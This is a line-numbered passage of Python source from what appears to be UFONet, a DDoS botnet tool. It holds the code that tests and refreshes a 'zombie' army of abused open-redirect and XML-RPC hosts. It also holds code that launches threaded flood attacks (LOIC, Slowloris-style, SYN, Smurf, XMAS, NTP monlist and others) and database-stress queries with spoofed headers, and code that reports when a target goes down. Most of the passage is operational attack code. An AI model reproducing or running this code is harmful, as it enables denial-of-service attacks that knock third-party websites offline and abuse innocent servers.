  4076. update_reply = input("[AI] Do you want to update your army? (Y/n)")
  4077. print('-'*25)
  4078. else:
  4079. update_reply = "Y"
  4080. if update_reply == "n" or update_reply == "N":
  4081. print("[AI] "+self.exit_msg+"\n")
  4082. return
  4083. else:
  4084. self.update_rpcs(rpcs_ready)
  4085. if not self.options.upload:
  4086. print("\n[Info] [AI] Botnet updated! -> ;-)\n")
  4087. def testing(self, zombies):
  4088. # test Open Redirect exploiting and show statistics
  4089. # HTTP HEAD check
  4090. army = 0
  4091. print ("Are 'they' alive? :-) (HEAD Check):")
  4092. print('='*35)
  4093. num_active_zombies = 0
  4094. num_failed_zombies = 0
  4095. active_zombies = []
  4096. print("Trying:", len(zombies))
  4097. print('-'*21)
  4098. for zombie in zombies:
  4099. zombie = str(zombie)
  4100. if zombie.startswith("http://") or zombie.startswith("https://"):
  4101. # send HEAD connection
  4102. self.head = True
  4103. try:
  4104. self.connect_zombies(zombie)
  4105. except:
  4106. pass
  4107. while self.herd.no_more_zombies() == False:
  4108. time.sleep(1)
  4109. for zombie in self.herd.done:
  4110. zombie = str(zombie)
  4111. t = urlparse(zombie)
  4112. if self.herd.get_result(zombie):
  4113. code_reply = self.herd.get_result(zombie)
  4114. self.head = False
  4115. if code_reply == "200" or code_reply == "302" or code_reply == "301": # HEAD check pass!
  4116. name_zombie = t.netloc
  4117. if name_zombie == "":
  4118. name_zombie = zombie
  4119. print("Zombie:", name_zombie)
  4120. print("Status: OK ["+ code_reply + "]")
  4121. num_active_zombies = num_active_zombies + 1
  4122. active_zombies.append(zombie)
  4123. elif code_reply == "401":
  4124. print("Zombie:", t.netloc)
  4125. print("Status: Unauthorized ["+ code_reply + "]")
  4126. num_failed_zombies = num_failed_zombies + 1
  4127. elif code_reply == "403":
  4128. print("Zombie:", t.netloc)
  4129. print("Status: Error Forbidden ["+ code_reply + "]")
  4130. num_failed_zombies = num_failed_zombies + 1
  4131. elif code_reply == "404":
  4132. print("Zombie:", t.netloc)
  4133. print("Status: Not Found ["+ code_reply + "]")
  4134. num_failed_zombies = num_failed_zombies + 1
  4135. elif code_reply == "500":
  4136. print("Zombie:", t.netloc)
  4137. print("Status: Internal Server Error ["+ code_reply + "]")
  4138. num_failed_zombies = num_failed_zombies + 1
  4139. else:
  4140. print("Zombie:", t.netloc, "\nVector:", zombie)
  4141. print("Status: Not Allowed ["+ code_reply + "]")
  4142. num_failed_zombies = num_failed_zombies + 1
  4143. else:
  4144. if self.options.verbose:
  4145. print("[Info] [Zombies] Reply:", "\n\nNothing!!!!!\n")
  4146. print("Zombie:", zombie)
  4147. print("Status: Malformed!")
  4148. num_failed_zombies = num_failed_zombies + 1
  4149. print('-'*10)
  4150. self.herd.reset()
  4151. print('='*18)
  4152. print("OK:", num_active_zombies, "Fail:", num_failed_zombies)
  4153. print('='*18 + "\n")
  4154. print('='*22)
  4155. if num_active_zombies > 0:
  4156. # check url parameter vectors
  4157. print ("Checking for payloads:")
  4158. print('='*22)
  4159. print("Trying:", num_active_zombies)
  4160. print('-'*21)
  4161. zombies_ready = []
  4162. num_waiting_zombies = 0
  4163. if num_active_zombies == 0:
  4164. num_disconnected_zombies = num_failed_zombies
  4165. else:
  4166. num_disconnected_zombies = 0
  4167. for zombie in active_zombies:
  4168. zombie = str(zombie)
  4169. t = urlparse(zombie)
  4170. name_zombie = t.netloc
  4171. if name_zombie == "":
  4172. name_zombie = zombie
  4173. self.payload = True
  4174. try:
  4175. self.connect_zombies(zombie)
  4176. except:
  4177. pass
  4178. self.payload = False
  4179. while self.herd.no_more_zombies() == False:
  4180. time.sleep(1)
  4181. for zombie in self.herd.done:
  4182. zombie = str(zombie)
  4183. t = urlparse(zombie)
  4184. name_zombie = t.netloc
  4185. if name_zombie == "":
  4186. name_zombie = zombie
  4187. payload_zombie = zombie
  4188. payload_reply = ""
  4189. print("Vector:", payload_zombie)
  4190. self.payload = True
  4191. if self.herd.get_result(zombie):
  4192. payload_reply = self.herd.get_result(zombie)
  4193. self.payload = False
  4194. if "https://www.whitehouse.gov" in payload_reply: #Open Redirect reply [requested by all UFONet motherships ;-)]
  4195. num_waiting_zombies = num_waiting_zombies + 1
  4196. print("Status:", "Waiting for orders... ;-)")
  4197. zombies_ready.append(zombie)
  4198. else:
  4199. num_disconnected_zombies = num_disconnected_zombies + 1
  4200. print("Status:", "Not ready...")
  4201. army = army + 1
  4202. print('-'*10)
  4203. self.herd.reset()
  4204. print('='*18)
  4205. print("OK:", num_waiting_zombies, "Fail:", num_disconnected_zombies)
  4206. print('='*18 + "\n")
  4207. # list of [Zombies] ready to attack
  4208. num_active_zombie = 0
  4209. for z in zombies_ready:
  4210. t = urlparse(z)
  4211. name_zombie = t.netloc
  4212. if name_zombie == "":
  4213. name_zombie = z
  4214. num_active_zombie = num_active_zombie + 1
  4215. if self.options.verbose:
  4216. print("Zombie [", num_active_zombie, "]:", name_zombie + "\n")
  4217. if self.options.testall: # testing_all
  4218. return zombies_ready, num_waiting_zombies, num_disconnected_zombies + num_failed_zombies
  4219. else:
  4220. print('-'*25 + "\n")
  4221. print('='*24)
  4222. print("Working [Zombies]:", num_active_zombie)
  4223. print('='*24)
  4224. if not self.options.forceyes:
  4225. update_reply = input("\n[AI] Do you want to update your army? (Y/n)")
  4226. print('-'*25)
  4227. else:
  4228. update_reply = "Y"
  4229. if update_reply == "n" or update_reply == "N":
  4230. print("[AI] "+self.exit_msg+"\n")
  4231. return
  4232. else:
  4233. self.update_zombies(zombies_ready)
  4234. if not self.options.upload:
  4235. print("\n[Info] [AI] Botnet updated! -> ;-)\n")
  4236. self.update_scanner_stats(self.scanned_zombies) # update json file with scanner stats (found via dorking)
  4237. else:
  4238. print('-'*25 + "\n")
  4239. print('='*24)
  4240. print("Working [Zombies]:", num_active_zombies)
  4241. print('='*24)
  4242. print("\n[Info] [AI] [Zombies] aren't replying to your HTTP HEAD requests! -> [Exiting!]\n")
  4243. def testing_all(self):
  4244. # test whole botnet
  4245. print ("\nChecking if [Zombies] are still infected (WARNING: this may take serveral time!)\n")
  4246. print('='*35)
  4247. zombies = self.extract_zombies()
  4248. rpcs = self.extract_rpcs()
  4249. aliens = self.extract_aliens()
  4250. droids = self.extract_droids()
  4251. ucavs = self.extract_ucavs()
  4252. try:
  4253. botnet = zombies + rpcs + aliens + droids + ucavs
  4254. tested_zombies = zombies + rpcs # test types supported: zombies + xml-rpcs
  4255. except:
  4256. return
  4257. zombies_ready, num_waiting_zombies, num_disconnected_zombies = self.testing(zombies)
  4258. rpcs_ready, num_active_rpcs, num_failed_rpcs = self.testing_rpcs(rpcs)
  4259. print("\n" + '='*52)
  4260. print("\n+ Total Botnet:", len(botnet))
  4261. print("\n" + '-'*25)
  4262. print("\n+ Total Tested:", len(tested_zombies))
  4263. print("\n - Zombies :", len(zombies), " [ OK:", str(num_waiting_zombies), "| FAILED:", str(num_disconnected_zombies), "]")
  4264. print(" - XML-RPCs:", len(rpcs), " [ OK:", str(num_active_rpcs), "| FAILED:", str(num_failed_rpcs), "]" + "\n")
  4265. print('='*52 + '\n')
  4266. if num_disconnected_zombies > 0 or num_failed_rpcs > 0:
  4267. if not self.options.forceyes:
  4268. update_reply = input("[AI] Do you want update your army? (Y/n)")
  4269. print('-'*25)
  4270. else:
  4271. update_reply = "Y"
  4272. if update_reply == "n" or update_reply == "N":
  4273. print("[AI] "+self.exit_msg+"\n")
  4274. return
  4275. else:
  4276. if num_disconnected_zombies > 0:
  4277. self.update_zombies(zombies_ready)
  4278. if num_failed_rpcs > 0:
  4279. self.update_rpcs(rpcs_ready)
  4280. if not self.options.upload:
  4281. print("\n[Info] [AI] Botnet updated! -> ;-)\n")
  4282. else:
  4283. print("[Info] [AI] [Control] ALL tested [Zombies] are working! ;-) -> [Exiting!]\n")
  4284. def attacking(self, zombies, target):
  4285. # perform a DDoS Web attack using Open Redirect vectors (and other Web Abuse services) as [Zombies]
  4286. if self.options.forcessl:
  4287. if target.startswith("http://"):
  4288. target = target.replace("http://", "https://") # force SSL/TLS
  4289. if target.startswith("http://") or target.startswith("https://"):
  4290. print("Attacking:", target)
  4291. print('='*55, "\n")
  4292. # send Open Redirect injection (multiple zombies > one target url)
  4293. reply = self.injection(target, zombies)
  4294. else:
  4295. print("\n[Error] [AI] Target not valid: "+target+" -> [Discarding!]\n")
  4296. def aiming_extra_weapons(self, target, proxy, loic, loris, ufosyn, spray, smurf, xmas, nuke, tachyon, monlist):
  4297. # perform some other extra attacks (such as DoS techniques)
  4298. time.sleep(2) # aiming (multi-threading flow time compensation)
  4299. if loic:
  4300. try:
  4301. self.options.loic = int(loic)
  4302. except:
  4303. self.options.loic = 100 # default LOIC requests
  4304. if self.options.loic < 1:
  4305. self.options.loic = 100
  4306. self.instance = LOIC() # instance main class for LOIC operations
  4307. self.t1 = threading.Thread(target=self.instance.attacking, args=(target, self.options.loic, proxy)) # LOIC using threads + proxy
  4308. self.t1.daemon = True # extra weapons are threaded as daemons
  4309. self.t1.start()
  4310. self.update_loic_stats() # add new LOIC attack to mothership stats
  4311. if loris:
  4312. try:
  4313. self.options.loris = int(loris)
  4314. except:
  4315. self.options.loris = 101 # default LORIS requests (apache -> max_clients: ~100 | nginx -> no limit (other method))
  4316. if self.options.loris < 1:
  4317. self.options.loris = 101
  4318. self.instance = LORIS() # instance main class for LORIS operations
  4319. self.t2 = threading.Thread(target=self.instance.attacking, args=(target, self.options.loris)) # LORIS using threads
  4320. self.t2.daemon = True
  4321. self.t2.start()
  4322. self.update_loris_stats() # add new LORIS attack to mothership stats
  4323. if ufosyn:
  4324. try:
  4325. self.options.ufosyn = int(ufosyn)
  4326. except:
  4327. self.options.ufosyn = 100 # default UFOSYN requests
  4328. if self.options.ufosyn < 1:
  4329. self.options.ufosyn = 100
  4330. self.instance = UFOSYN() # instance main class for UFOSYN operations
  4331. self.t3 = threading.Thread(target=self.instance.attacking, args=(target, self.options.ufosyn)) # UFOSYN using threads
  4332. self.t3.daemon = True
  4333. self.t3.start()
  4334. self.update_ufosyn_stats() # add new UFOSYN attack to mothership stats
  4335. if spray:
  4336. try:
  4337. self.options.spray = int(spray)
  4338. except:
  4339. self.options.spray = 100 # default SPRAY requests
  4340. if self.options.spray < 1:
  4341. self.options.spray = 100
  4342. self.instance = SPRAY() # instance main class for SPRAY operations
  4343. self.t4 = threading.Thread(target=self.instance.attacking, args=(target, self.options.spray)) # SPRAY using threads
  4344. self.t4.daemon = True
  4345. self.t4.start()
  4346. self.update_spray_stats() # add new SPRAY attack to mothership stats
  4347. if smurf:
  4348. try:
  4349. self.options.smurf = int(smurf)
  4350. except:
  4351. self.options.smurf = 101 # default SMURF requests
  4352. if self.options.smurf < 1:
  4353. self.options.smurf = 101
  4354. self.instance = SMURF() # instance main class for SMURF operations
  4355. self.t5 = threading.Thread(target=self.instance.attacking, args=(target, self.options.smurf)) # SMURF using threads
  4356. self.t5.daemon = True
  4357. self.t5.start()
  4358. self.update_smurf_stats() # add new SMURF attack to mothership stats
  4359. if xmas:
  4360. try:
  4361. self.options.xmas = int(xmas)
  4362. except:
  4363. self.options.xmas = 101 # default XMAS requests
  4364. if self.options.xmas < 1:
  4365. self.options.xmas = 101
  4366. self.instance = XMAS() # instance main class for XMAS operations
  4367. self.t6 = threading.Thread(target=self.instance.attacking, args=(target, self.options.xmas)) # XMAS using threads
  4368. self.t6.daemon = True
  4369. self.t6.start()
  4370. self.update_xmas_stats() # add new XMAS attack to mothership stats
  4371. if nuke:
  4372. if sys.platform == "linux" or sys.platform == "linux2":
  4373. try:
  4374. self.options.nuke = int(nuke)
  4375. except:
  4376. self.options.nuke = 10000 # default NUKE requests
  4377. if self.options.nuke < 1:
  4378. self.options.nuke = 10000
  4379. self.instance = NUKE() # instance main class for NUKE operations
  4380. self.t7 = threading.Thread(target=self.instance.attacking, args=(target, self.options.nuke)) # NUKE using threads
  4381. self.t7.daemon = True # extra weapons are threaded as daemons
  4382. self.t7.start()
  4383. self.update_nuke_stats() # add new NUKE attack to mothership stats
  4384. else:
  4385. print("\n[Info] [AI] Your OS cannot perform this attack... -> [Passing!]\n")
  4386. if tachyon:
  4387. try:
  4388. self.options.tachyon = int(tachyon)
  4389. except:
  4390. self.options.tachyon = 1000 # default TACHYON requests
  4391. if self.options.tachyon < 1:
  4392. self.options.tachyon = 1000
  4393. self.instance = TACHYON() # instance main class for TACHYON operations
  4394. self.t8 = threading.Thread(target=self.instance.attacking, args=(target, self.options.tachyon)) # TACHYON using threads
  4395. self.t8.daemon = True
  4396. self.t8.start()
  4397. self.update_tachyon_stats() # add new TACHYON attack to mothership stats
  4398. if monlist:
  4399. try:
  4400. self.options.monlist = int(monlist)
  4401. except:
  4402. self.options.monlist = 1000 # default MONLIST requests
  4403. if self.options.monlist < 1:
  4404. self.options.monlist = 1000
  4405. self.instance = MONLIST() # instance main class for MONLIST operations
  4406. self.t9 = threading.Thread(target=self.instance.attacking, args=(target, self.options.monlist)) # MONLIST using threads
  4407. self.t9.daemon = True
  4408. self.t9.start()
  4409. self.update_monlist_stats() # add new MONLIST attack to mothership stats
  4410. def stressing(self, target, zombie):
  4411. # perform a DDoS Web attack against a target, requesting records on target's database
  4412. options = self.options
  4413. db_input = self.options.dbstress
  4414. def random_key(length):
  4415. key = ''
  4416. for i in range(length):
  4417. key += random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits)
  4418. return key
  4419. # generating random alphanumeric queries
  4420. if self.db_flash > 9: # set db flash start on: 10
  4421. length = 1024 # search a heavy random length query (db flash): 1024
  4422. self.db_flash = 0 # reset db flash counter
  4423. else:
  4424. length = 1 # search for one different (alphanumeric) character each time will produces more positive results on db
  4425. key = str(random_key(length))
  4426. if self.db_flash > 9:
  4427. print("[Info] [DBStress] Trying database request to: " + db_input + " | Query used: db flash! " + "(" + str(length) + " chars)")
  4428. else:
  4429. print("[Info] [DBStress] Trying database request to: " + db_input + " | Query used: " + key)
  4430. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  4431. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  4432. if not target.endswith('/'): # add "/" to end of target
  4433. target = target + "/"
  4434. url = zombie + target + db_input + key
  4435. req = urllib.request.Request(url, None, headers)
  4436. if options.proxy: # set proxy
  4437. self.proxy_transport(options.proxy)
  4438. try:
  4439. req_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
  4440. except urllib.error.HTTPError as e:
  4441. if e.code == 401:
  4442. print('[Info] [DBStress] Not authorized')
  4443. elif e.code == 404:
  4444. print('[Info] [DBStress] Not found')
  4445. elif e.code == 503:
  4446. print('[Info] [DBStress] Service unavailable')
  4447. else:
  4448. print('[Info] [DBStress] Unknown error')
  4449. else:
  4450. print('[Info] [DBStress] Database query: HIT!')
  4451. def attackme(self, zombies):
  4452. # perform a DDoS Web attack against yourself
  4453. print("[AI] Starting local port to listening at: " + self.port + "\n")
  4454. print('='*21 + "\n")
  4455. self.doll=Doll(self)
  4456. self.doll.start()
  4457. while not self.doll._armed:
  4458. time.sleep(1)
  4459. # send Open Redirect injection (multiple zombies-multiple target urls)
  4460. target = ""
  4461. self.injection(target, zombies)
  4462. self.doll.shutdown()
  4463. self.doll.join()
  4464. self.herd.list_fails()
  4465. def check_target_status(self):
  4466. if self.num_is_down > 0 and self.num_is_up == 0: # check for: 1 or more down, 0 up
  4467. print("\n[Info] [AI] Congratulations!! -> [Target looks OFFLINE!]\n")
  4468. if not self.options.forceyes:
  4469. update_reply = input("[AI] Do you want to send a [HEAD] check request? (y/N)")
  4470. print("\n" + '-'*25)
  4471. else:
  4472. update_reply = "N"
  4473. if update_reply == "y" or update_reply == "Y":
  4474. try: # send HEAD connection
  4475. self.head = True
  4476. reply = self.connect_zombie(target)
  4477. self.head = False
  4478. if reply:
  4479. print("\n[Info] [AI] [Control] Target has replied you! -> [Keep shooting!]\n")
  4480. else:
  4481. print("\n[Info] [AI] " + target + " -> [TANGO DOWN!!!]\n")
  4482. self.update_targets_crashed() # update targets crashed stats
  4483. self.update_mothership_stats() # update mothership completed attack stats
  4484. except Exception:
  4485. print("\n[Error] [AI] Something wrong with your connection!...\n")
  4486. if DEBUG == True:
  4487. traceback.print_exc()
  4488. return
  4489. else:
  4490. print("\n[Info] [AI] " + target + " -> [TANGO DOWN!!!]\n")
  4491. self.update_targets_crashed() # update targets crashed stats
  4492. self.update_mothership_stats() # update mothership completed attack stats
  4493. return
  4494. def starting_target_check(self, target, head_check):
  4495. options = self.options
  4496. head_check_here = False
  4497. head_check_external = False
  4498. if options.disablehead: # check at start is disabled (skipping!)
  4499. print("[Info] [AI] Skipping external check...\n")
  4500. head_check_here = True
  4501. head_check_external = True
  4502. else:
  4503. if head_check:
  4504. if not options.attackme:
  4505. print("[AI] Launching: 'Is target up?' check...\n")
  4506. try: # send HEAD connection
  4507. self.head = True
  4508. reply = self.connect_zombie(target)
  4509. self.head = False
  4510. if reply:
  4511. print("[Info] [AI] [Control] From YOU: YES -> ["+str(reply)+"-OK]")
  4512. head_check_here = True
  4513. else:
  4514. print("[Info] [AI] [Control] From YOU: NO -> [Target looks OFFLINE!]")
  4515. head_check_here = False
  4516. except Exception:
  4517. print("[Error] [AI] [Control] From YOU: NO -> [Cannot connect!]")
  4518. if DEBUG == True:
  4519. traceback.print_exc()
  4520. head_check_here = False
  4521. else: # check if local IP/PORT is listening on mothership
  4522. print("[AI] Launching: 'Is NAT ready?' check...\n")
  4523. try:
  4524. sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
  4525. result = sock.connect_ex(('0.0.0.0',8080))
  4526. if result == 0 or result == 110: # black magic
  4527. print("[Info] [AI] [Control] Local port: YES | Mothership accesible from -private- IP: http://0.0.0.0:8080")
  4528. head_check_here = True
  4529. else:
  4530. print("[Info] [AI] [Control] Local port: NO | Something goes wrong with your port: 8080")
  4531. head_check_here = False
  4532. except Exception:
  4533. print("[Error] [AI] [Control] Local port: NO | Something wrong checking for open ports...")
  4534. if DEBUG == True:
  4535. traceback.print_exc()
  4536. head_check_here = False
  4537. else:
  4538. head_check_here = True
  4539. # check target using external check services
  4540. self.external = True
  4541. if not options.attackme:
  4542. try:
  4543. target = self.parse_url_encoding(target) # parse for proper url encoding
  4544. try:
  4545. url = self.external_check_service1 + target # check from external service [1]
  4546. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  4547. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  4548. if options.proxy: # set proxy
  4549. self.proxy_transport(options.proxy)
  4550. req = urllib.request.Request(url, None, headers)
  4551. external_reply = urllib.request.urlopen(req, context=self.ctx).read()
  4552. if b"returned code 200 OK and is up" in external_reply:
  4553. t = urlparse(self.external_check_service1)
  4554. name_external1 = t.netloc
  4555. print("[Info] [AI] [Control] From OTHERS: YES -> ["+name_external1+"]")
  4556. head_check_external = True
  4557. except:
  4558. url = self.external_check_service2 + target # check from external service [2]
  4559. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  4560. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  4561. if options.proxy: # set proxy
  4562. self.proxy_transport(options.proxy)
  4563. req = urllib.request.Request(url, None, headers)
  4564. try:
  4565. req_reply = urllib.request.urlopen(req, context=self.ctx).read()
  4566. if b"It's just you" in req_reply:
  4567. t = urlparse(self.external_check_service2)
  4568. name_external2 = t.netloc
  4569. print("[Info] [AI] [Control] From OTHERS: YES -> ["+name_external2+"]")
  4570. head_check_external = True
  4571. else:
  4572. print("[Info] [AI] [Control] From OTHERS: NO -> [Target looks OFFLINE!]")
  4573. head_check_external = False
  4574. except urllib.error.HTTPError as e:
  4575. if e:
  4576. print("[Error] [AI] [Control] [ "+ self.external_check_service2 +" ] isn't replying to your requests! -> [Passing!]")
  4577. print ("[Info] [AI] [Control] From OTHERS: NO -> [Target looks OFFLINE!]")
  4578. head_check_external = False
  4579. except Exception:
  4580. print("[Error] [AI] [Control] From OTHERS: NO -> [Cannot connect!]")
  4581. if DEBUG == True:
  4582. traceback.print_exc()
  4583. head_check_external = False
  4584. else:
  4585. try: # check mothership from public ip / NAT using HEAD request
  4586. try:
  4587. req = urllib.request.Request(str(self.pub_ip+":8080"), method="HEAD")
  4588. reply = urllib.request.urlopen(req)
  4589. except Exception:
  4590. reply = None
  4591. if reply:
  4592. print("[Info] [AI] [Control] From OTHERS: YES -> [Mothership OK!] -> ["+str(self.pub_ip)+":8080]")
  4593. head_check_external = True
  4594. else:
  4595. print("[Info] [AI] [Control] From OTHERS: NO -> [Cannot connect!] -> [NAT is failing!]")
  4596. head_check_external = False
  4597. head_check_here = False # stop attack if not public IP available
  4598. except Exception:
  4599. print("[Error] [AI] [Control] From OTHERS: NO -> [Check failed!]")
  4600. head_check_here = False # stop attack if not public IP available
  4601. if DEBUG == True:
  4602. traceback.print_exc()
  4603. head_check_external = False
  4604. self.external = False
  4605. return head_check_here, head_check_external
  4606. def injection(self, target, zombies, head_check = True):
  4607. options = self.options
  4608. # check target's integrity at start
  4609. head_check_here, head_check_external = self.starting_target_check(target, head_check)
  4610. # ask user to confirm the attack
  4611. if head_check_here == True or head_check_external == True:
  4612. if not self.options.forceyes:
  4613. if not options.attackme:
  4614. if not options.disablehead:
  4615. start_reply = input("\n[AI] Target is ONLINE!. Do you want to start an attack? (y/N)\n")
  4616. else:
  4617. start_reply = input("[AI] Do you want to start an attack, directly? (y/N)\n")
  4618. else:
  4619. if not options.disablehead:
  4620. start_reply = input("\n[AI] Mothership is READY!. Do you want to start an attack 'against yourself'? (y/N)\n")
  4621. else:
  4622. start_reply = input("[AI] Do you want to start an attack 'against yourself', directly? (y/N)\n")
  4623. else:
  4624. start_reply = "Y"
  4625. if start_reply == "y" or start_reply == "Y":
  4626. if options.attackme:
  4627. total_rounds = 2 # default rounds for attackme
  4628. else:
  4629. total_rounds = options.rounds # extract number of rounds
  4630. try:
  4631. total_rounds = int(total_rounds)
  4632. except:
  4633. total_rounds = 1
  4634. if not total_rounds:
  4635. total_rounds = 1
  4636. if total_rounds <= 0:
  4637. total_rounds = 1
  4638. self.herd.cleanup()
  4639. num_round = 1
  4640. num_hits = 0
  4641. num_zombie = 1
  4642. # start to attack the target with [MODS]
  4643. if options.loic or options.loris or options.ufosyn or options.spray or options.smurf or options.xmas or options.nuke or options.tachyon or options.monlist:
  4644. ex = threading.Thread(target=self.aiming_extra_weapons, args=(target, self.options.proxy, self.options.loic, self.options.loris, self.options.ufosyn, self.options.spray, self.options.smurf, self.options.xmas, self.options.nuke, self.options.tachyon, self.options.monlist)) # multithreading flow for extra attacks
  4645. ex.daemon = True # extra weapons are threaded as daemons
  4646. ex.start()
  4647. # start to attack the target with [ARMY]
  4648. zombies = self.extract_zombies() # extract zombies from file
  4649. if zombies:
  4650. self.total_zombie = len(zombies)
  4651. else:
  4652. self.total_zombie = 0
  4653. return
  4654. self.herd=Herd(self)
  4655. if not self.options.disablepurge:
  4656. self.discardzombies = []
  4657. self.discard_aliens = []
  4658. self.discard_droids = []
  4659. self.discard_rpcs = []
  4660. self.discard_ucavs = []
  4661. total_disc_zombies = 0
  4662. self.num_discard_zombies = 0
  4663. self.num_discard_aliens = 0
  4664. self.num_discard_droids = 0
  4665. self.num_discard_rpcs = 0
  4666. self.num_discard_ucavs = 0
  4667. self.empty_zombies = False
  4668. for i in range(0, int(total_rounds)): # start attacking using rounds
  4669. print ("\x1b[2J\x1b[H")# clear screen (black magic)
  4670. print('='*42)
  4671. print('Starting round:', num_round, ' of ', total_rounds)
  4672. print('='*42)
  4673. self.herd.reset()
  4674. self.extra_zombies_lock = True
  4675. self.total_zombies_failed_connection = 0 # reset failed [Zombies] connection counter each round
  4676. self.send_zombies(zombies) # send [Zombies]
  4677. if not self.options.attackme:
  4678. if not self.options.disablealiens or not self.options.disabledroids or not self.options.disablerpcs or not self.options.disableucavs:
  4679. if self.options.verbose:
  4680. print("[Info] [AI] [Control] All [Zombies] have returned for this round... -> [Waiting!]")
  4681. self.send_extra_zombies() # send [ARMY]
  4682. while self.extra_zombies_lock == True:
  4683. time.sleep(1) # wait for [ARMY] to return
  4684. if self.options.verbose:
  4685. print("\n" + '='*42)
  4686. print("\n[Info] [AI] [Control] Full [ARMY] has returned for this round! -> [Refolding!]")
  4687. else:
  4688. zombies_lock = 0
  4689. if self.options.expire: # set timing for purge
  4690. try:
  4691. timing = int(self.options.expire)
  4692. except:
  4693. timing = self.expire_timing # default timing for purge
  4694. else:
  4695. timing = self.expire_timing # default timing for purge
  4696. if timing < 1:
  4697. timing = self.expire_timing # default timing for purge
  4698. zombies_arrival_timing = timing # timing = trying to control round time for threading flow
  4699. while self.herd.no_more_zombies() == False: # waiting for [Zombies] to return
  4700. zombies_lock = zombies_lock + 1
  4701. if zombies_lock > zombies_arrival_timing: # execute main abandoning routine!
  4702. if self.options.verbose:
  4703. print("[Info] [AI] [Control] Return time set [~"+str(zombies_arrival_timing)+"] for [Zombies] is over! -> [Expiring!]")
  4704. break
  4705. else:
  4706. time.sleep(1)
  4707. if self.options.verbose:
  4708. print("\n" + '='*42)
  4709. print("\n[Info] [AI] [Control] All [Zombies] have returned for this round! -> [Refolding!]")
  4710. if not self.options.attackme and not self.options.disableucavs: # check for target's status returned by [UCAVs]
  4711. self.check_target_status()
  4712. if not self.options.attackme and not self.options.disablepurge: # enable [Zombies] purge round check
  4713. self.abandoning_zombies() # check for abandoning zombies
  4714. for zombie in self.herd.done: # check for num hits
  4715. if self.herd.connection_failed(zombie) == False:
  4716. num_hits = num_hits + 1
  4717. num_zombie = num_zombie + 1
  4718. if num_zombie > self.total_zombie:
  4719. num_zombie = 1
  4720. if not self.options.attackme and not self.options.disablescanner: # perform a broadband test on target
  4721. check_is_loading = self.check_is_loading(target)
  4722. self.herd.dump_html()
  4723. if not self.options.disablepurge:
  4724. if self.empty_zombies == True:
  4725. break # exit routine when not any more zombies
  4726. num_round = num_round + 1
  4727. if self.options.verbose:
  4728. print("\n" + '='*42)
  4729. print("\n[Info] [AI] This battle is over! -> [Reporting!]")
  4730. if self.options.loic: # try to stop daemons/threads for extra weapons
  4731. self.t1.join()
  4732. if self.options.loris:
  4733. self.t2.join()
  4734. if self.options.ufosyn:
  4735. self.t3.join()
  4736. if self.options.spray:
  4737. self.t4.join()
  4738. if self.options.smurf:
  4739. self.t5.join()
  4740. if self.options.xmas:
  4741. self.t6.join()
  4742. if self.options.nuke:
  4743. self.t7.join()
  4744. if self.options.tachyon:
  4745. self.t8.join()
  4746. if self.options.monlist:
  4747. self.t9.join()
  4748. if self.options.target_list:
  4749. self.num_target_list = self.num_target_list - 1 # num_target_list = 0 provokes exit!
  4750. print ("\x1b[2J\x1b[H") # black magic
  4751. if not self.options.attackme: # show herd results
  4752. self.herd.dump()
  4753. else: # show doll results
  4754. print('='*21)
  4755. print("\n[Info] [AI] Mothership transmission...\n")
  4756. num_real_zombies = len(self.doll.real_zombies)
  4757. print("[Info] [AI] Total of [Zombies] that are 100% vulnerable to Open Redirect (CWE-601): " + str(num_real_zombies) + "\n")
  4758. for z in self.doll.real_zombies: # show only alien verified zombies
  4759. for x in z:
  4760. print(" - " + str(x))
  4761. self.herd.dump_html(True) # show (all) zombies statistics
  4762. if not self.options.attackme:
  4763. if not self.options.disablepurge:
  4764. print("\n[Info] [AI] Report completed! -> [Purging!]\n")
  4765. else:
  4766. if not options.target_list:
  4767. print("\n[Info] [AI] Report completed! -> [Exiting!]\n")
  4768. else:
  4769. print("\n[Info] [AI] Report completed! -> [OK!]\n")
  4770. self.update_mothership_stats() # update mothership stats
  4771. if not self.options.disablepurge:
  4772. print('='*21+ "\n")
  4773. total_disc_zombies = self.num_discard_zombies + self.num_discard_aliens + self.num_discard_droids + self.num_discard_rpcs + self.num_discard_ucavs
  4774. if total_disc_zombies > 0 and total_disc_zombies < 2:
  4775. print("[Info] [AI] [Control] You have [" + str(total_disc_zombies) + "] unit that isn't working as expected...\n")
  4776. elif total_disc_zombies > 1:
  4777. print("[Info] [AI] [Control] You have [" + str(total_disc_zombies) + "] units that aren't working as expected...\n")
  4778. if self.num_discard_zombies > 0:
  4779. print(" + Zombies: ["+ str(self.num_discard_zombies)+"]")
  4780. if self.num_discard_aliens > 0:
  4781. print(" + Aliens : ["+ str(self.num_discard_aliens)+"]")
  4782. if self.num_discard_droids > 0:
  4783. print(" + Droids : ["+ str(self.num_discard_droids)+"]")
  4784. if self.num_discard_rpcs > 0:
  4785. print(" + X-RPCs : ["+ str(self.num_discard_rpcs)+"]")
  4786. if self.num_discard_ucavs > 0:
  4787. print(" + UCAVs : ["+ str(self.num_discard_ucavs)+"]")
  4788. if total_disc_zombies > 0:
  4789. if not self.options.forceyes:
  4790. if total_disc_zombies > 0 and total_disc_zombies < 2:
  4791. backup_reply = input("\n[AI] Do you want to purge it from your files? (Y/n)\n")
  4792. elif total_disc_zombies > 1:
  4793. backup_reply = input("\n[AI] Do you want to purge them from your files? (Y/n)\n")
  4794. else:
  4795. backup_reply = "Y"
  4796. if backup_reply == "y" or backup_reply == "Y":
  4797. print("\n[Info] [AI] Purging failed units from files...\n")
  4798. discarded = []
  4799. if self.num_discard_zombies > 0:
  4800. for z in self.discardzombies:
  4801. discarded.append(z)
  4802. print(" + [Info] [Zombies] "+z+" -> [Purged!]")
  4803. if self.num_discard_aliens > 0:
  4804. for a in self.discard_aliens:
  4805. discarded.append(a)
  4806. print(" + [Info] [Aliens] "+a+" -> [Purged!]")
  4807. if self.num_discard_droids > 0:
  4808. for d in self.discard_droids:
  4809. discarded.append(d)
  4810. print(" + [Info] [Droids] "+d+" -> [Purged!]")
  4811. if self.num_discard_rpcs > 0:
  4812. for r in self.discard_rpcs:
